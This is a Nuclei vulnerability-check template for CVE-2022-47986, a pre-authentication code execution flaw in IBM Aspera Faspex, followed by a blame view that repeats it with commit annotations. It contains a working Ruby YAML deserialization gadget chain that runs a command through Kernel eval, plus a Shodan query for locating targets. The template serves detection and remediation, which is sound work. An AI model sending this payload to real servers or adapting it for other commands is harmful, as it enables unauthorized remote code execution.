nuclei-templates/cves/2022/CVE-2022-47986.yaml

id: CVE-2022-47986

info:
  name: Pre-Auth RCE in Aspera Faspex
  author: coldfish
  severity: critical
  description: |
    IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.
  reference:
    - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/
    - https://www.ibm.com/support/pages/node/6952319
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512
  remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47986
  metadata:
    shodan-query: html:"Aspera Faspex"
    verified: "true"
  tags: cve,cve2022,ibm,aspera,faspex,kev

requests:
  - raw:
      - |
        POST /aspera/faspex/package_relay/relay_package HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n    i: x\n- !ruby/object:Gem::SpecFetcher\n    i: y\n- !ruby/object:Gem::Requirement\n  requirements:\n    !ruby/object:Gem::Package::TarReader\n    io: &1 !ruby/object:Net::BufferedIO\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\n         read: 0\n         header: \"pew\"\n      debug_output: &1 !ruby/object:Net::WriteAdapter\n         socket: &1 !ruby/object:PrettyPrint\n             output: !ruby/object:Net::WriteAdapter\n                 socket: &1 !ruby/module \"Kernel\"\n                 method_id: :eval\n             newline: \"throw `id`\"\n             buffer: {}\n             group_stack:\n              - !ruby/object:PrettyPrint::Group\n                break: true\n         method_id: :breakable\n", "package_name": "{{rand_base(4)}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{rand_base(8)}}", "delivery_title": "{{rand_base(4)}}", "delivery_note": "{{rand_base(4)}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 500
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`id: CVE-2022-47986`

			`info:`
			`name: Pre-Auth RCE in Aspera Faspex`
			`author: coldfish`
			`severity: critical`
fix matcher and template 2023-02-03 09:34:07 +00:00			`description: \|`
			`IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.`
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`reference:`
			`- https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/`
			`- https://www.ibm.com/support/pages/node/6952319`
Auto Generated CVE annotations [Mon Feb 20 10:02:27 UTC 2023] :robot: 2023-02-20 10:02:27 +00:00			`- https://exchange.xforce.ibmcloud.com/vulnerabilities/243512`
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-47986`
fix matcher and template 2023-02-03 09:34:07 +00:00			`metadata:`
			`shodan-query: html:"Aspera Faspex"`
Auto Generated CVE annotations [Mon Feb 20 10:02:27 UTC 2023] :robot: 2023-02-20 10:02:27 +00:00			`verified: "true"`
Auto Generated CVE annotations [Thu Feb 23 10:12:47 UTC 2023] :robot: 2023-02-23 10:12:47 +00:00			`tags: cve,cve2022,ibm,aspera,faspex,kev`
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /aspera/faspex/package_relay/relay_package HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/json`

change hardcoded-strings 2023-02-03 17:51:49 +00:00			{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{rand_base(4)}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{rand_base(8)}}", "delivery_title": "{{rand_base(4)}}", "delivery_note": "{{rand_base(4)}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00
fix matcher and template 2023-02-03 09:34:07 +00:00			`matchers-condition: and`
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`matchers:`
fix matcher and template 2023-02-03 09:34:07 +00:00			`- type: regex`
			`regex:`
			`- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'`

Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`- type: word`
fix matcher and template 2023-02-03 09:34:07 +00:00			`part: header`
Create CVE-2022-47986.yaml 2023-02-03 09:18:45 +00:00			`words:`
fix matcher and template 2023-02-03 09:34:07 +00:00			`- "text/html"`

			`- type: status`
			`status:`
			`- 500`